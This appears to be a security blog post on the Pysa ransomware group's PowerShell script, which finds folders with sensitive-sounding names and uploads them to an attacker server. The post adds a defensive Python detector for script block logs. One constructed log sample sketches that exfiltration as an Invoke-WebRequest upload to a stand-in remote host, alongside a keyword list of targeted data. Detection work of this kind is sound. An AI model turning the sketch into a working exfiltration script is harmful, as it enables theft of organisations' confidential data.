Last Updated on 22/11/2021 by Khushi
Attackers keep evolving, refining their tools and techniques. BleepingComputer, together with MalwareHunterTeam, shared a script used by the Pysa ransomware group, which runs a PowerShell script as part of its intrusions into targeted networks.
(Image courtesy of howtofix.guide)
PowerShell is a scripting language commonly used to automate system management, and it is sometimes abused for malicious purposes. Before encrypting data, and before their manual sweep of the victim's data, the attackers run this script. It is designed to scan every drive for data folders whose names match specific strings listed in the script; when a folder name matches one of those strings, the script uploads that folder to a remote server under the attacker's control.
The script shared by MalwareHunterTeam contains about 123 keywords that it searches for. This benefits security teams and organisations because it gives them insight into what kind of data an attacker considers valuable. As expected, the list targets files that are important to a firm and can be used as leverage: financial and personal information about a company, including audit and banking information, SSNs, tax forms, credentials and SEC documents. The script also searches for keywords such as secret, hidden, illegal, fraud, crime and federal. The full list of keywords targeted by the threat actors is given below.
(Image courtesy of howtofix.guide)
The list certainly doesn't guarantee a system that is "free from hack". However, knowing which data might be targeted gives us a head start, because we can apply countermeasures.
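One such countermeasure is to look for the shape of this script in PowerShell script block logs rather than waiting for the encryption stage. The example below is added here and is not code from the article, from BleepingComputer or from MalwareHunterTeam: it triages constructed, simplified script block log entries (field names `ScriptBlockId` and `ScriptBlockText` are taken from Windows PowerShell script block logging, event ID 4104, but the entries themselves are made up for the example) and flags a script that combines three things the article describes: drive enumeration, a recursive folder walk, and an upload primitive, together with an unusual number of "valuable data" keywords. The keyword list is an illustrative subset of the categories the article names, not the 123-entry list, which is only available as an image.

```python
"""
Heuristic triage of PowerShell script block log entries for the pattern the
article describes: enumerate drives, walk folders for sensitive-looking names,
upload matches. Added example; runs offline on constructed log entries and
never touches the filesystem or the network.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Illustrative subset of the keyword categories named in the article
# (assumption: the real list has ~123 entries and is not reproduced here).
# Entries are matched as word prefixes, so "bank" also covers "banking".
SENSITIVE_KEYWORDS = [
    "audit", "bank", "ssn", "tax", "credential", "secret", "hidden",
    "illegal", "fraud", "crime", "federal", "financ", "personal",
]
KEYWORD_RE = re.compile(r"\b(" + "|".join(SENSITIVE_KEYWORDS) + r")", re.I)

# Real PowerShell cmdlets / .NET members typically seen at each stage.
DRIVE_ENUM = re.compile(r"Get-PSDrive|\[System\.IO\.DriveInfo\]", re.I)
RECURSIVE_WALK = re.compile(r"(Get-ChildItem|\bgci\b)[^\n]*-Recurse", re.I)
UPLOAD = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadFile|UploadData", re.I
)


@dataclass
class Verdict:
    suspicious: bool
    keyword_hits: List[str]          # distinct keywords found, sorted
    stages: List[str]                # which of the three stages were seen
    reasons: List[str] = field(default_factory=list)


def find_keyword_hits(script: str) -> List[str]:
    """Distinct sensitive keywords (normalised to the list entry) in the script text."""
    return sorted({m.group(1).lower() for m in KEYWORD_RE.finditer(script)})


def analyze_script_block(script: str, keyword_threshold: int = 5) -> Verdict:
    """Flag a script only when a keyword list AND a walk/enumerate AND an upload co-occur.

    A backup job that walks a tree, or a reporting script that POSTs a JSON body,
    each exhibits one stage on its own and is left alone; the article's script
    exhibits all of them in one block.
    """
    hits = find_keyword_hits(script)
    stages = []
    if DRIVE_ENUM.search(script):
        stages.append("drive_enumeration")
    if RECURSIVE_WALK.search(script):
        stages.append("recursive_walk")
    if UPLOAD.search(script):
        stages.append("upload")

    reasons = []
    if len(hits) >= keyword_threshold:
        reasons.append(f"{len(hits)} sensitive-data keywords in one script block")
    walks = "recursive_walk" in stages or "drive_enumeration" in stages
    if walks and "upload" in stages:
        reasons.append("filesystem enumeration combined with an upload primitive")

    suspicious = len(hits) >= keyword_threshold and walks and "upload" in stages
    return Verdict(suspicious, hits, stages, reasons)


def triage_log(entries: List[Dict[str, str]]) -> List[str]:
    """Return the ScriptBlockIds of entries that match the pattern."""
    return [e["ScriptBlockId"] for e in entries
            if analyze_script_block(e["ScriptBlockText"]).suspicious]


# Constructed sample entries (not real log data).
SAMPLE_ENTRIES = [
    {   # routine cleanup job: walks a tree, one keyword, no upload
        "ScriptBlockId": "blk-0001",
        "ScriptBlockText": (
            "Get-ChildItem -Path D:\\Backups -Recurse | "
            "Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-30) } | Remove-Item\n"
            "Write-Output 'audit of old backups complete'"
        ),
    },
    {   # sketch of the three stages the article describes (elided, not the real script)
        "ScriptBlockId": "blk-0002",
        "ScriptBlockText": (
            "$words = 'audit','banking','ssn','tax','credential','secret','fraud','federal'\n"
            "foreach ($d in Get-PSDrive -PSProvider FileSystem) {\n"
            "  Get-ChildItem $d.Root -Directory -Recurse | Where-Object { ... } |\n"
            "    ForEach-Object { Invoke-WebRequest -Uri $remoteHost -Method Post -InFile $_ }\n"
            "}"
        ),
    },
    {   # legitimate reporting script: uploads, but no walk and no keywords
        "ScriptBlockId": "blk-0003",
        "ScriptBlockText": "Invoke-RestMethod -Uri $reportApi -Method Post -Body $json",
    },
]


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        v = analyze_script_block(entry["ScriptBlockText"])
        print(entry["ScriptBlockId"], "SUSPICIOUS" if v.suspicious else "ok",
              v.keyword_hits, v.stages, v.reasons)
```

The threshold of five distinct keywords is an assumption chosen so that a single incidental word such as "audit" in an admin script does not trigger; tune it against your own script block logs before relying on it, and treat a hit as a lead for investigation rather than proof.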